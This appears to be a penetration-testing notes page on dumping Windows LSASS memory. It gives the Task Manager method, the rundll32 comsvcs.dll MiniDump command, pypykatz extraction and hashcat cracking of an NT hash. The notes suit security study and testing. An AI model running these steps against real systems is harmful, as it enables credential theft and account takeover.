LSASS

Dumping LSASS

1. Task Manager Method

Open Task Manager > Select the Processes tab > Find & right click the Local Security Authority Process > Select Create dump file

C:\Users\loggedonusersdirectory\AppData\Local\Temp\lsass.DMP

2. Rundll32.exe and Comsvcs.dll Method

Finding LSASS PID

C:\Windows\system32> tasklist /svc

Image Name                     PID Services
========================= ======== ============================================
lsass.exe                      672 KeyIso, SamSs, VaultSvc

PS C:\Windows\system32> Get-Process lsass

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
   1260      21     4948      15396       2.56    672   0 lsass

Creating lsass.dmp

PS C:\Windows\system32> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full

Using pypykatz to extract credential

Running pypykatz

$ pypykatz lsa minidump /home/peter/Documents/lsass.dmp

Cracking the NT hash with hashcat

$ sudo hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt

PreviousSAM/LSA NextActive Directory and NTDS.dit

Last updated 2 years ago

hashtagDumping LSASS

hashtag1. Task Manager Method

hashtag2. Rundll32.exe and Comsvcs.dll Method

hashtagFinding LSASS PID

hashtagUsing pypykatz to extract credential

hashtagRunning pypykatz

hashtagCracking the NT hash with hashcat

hashtag

Dumping LSASS

1. Task Manager Method

2. Rundll32.exe and Comsvcs.dll Method

Finding LSASS PID

Using pypykatz to extract credential

Running pypykatz

Cracking the NT hash with hashcat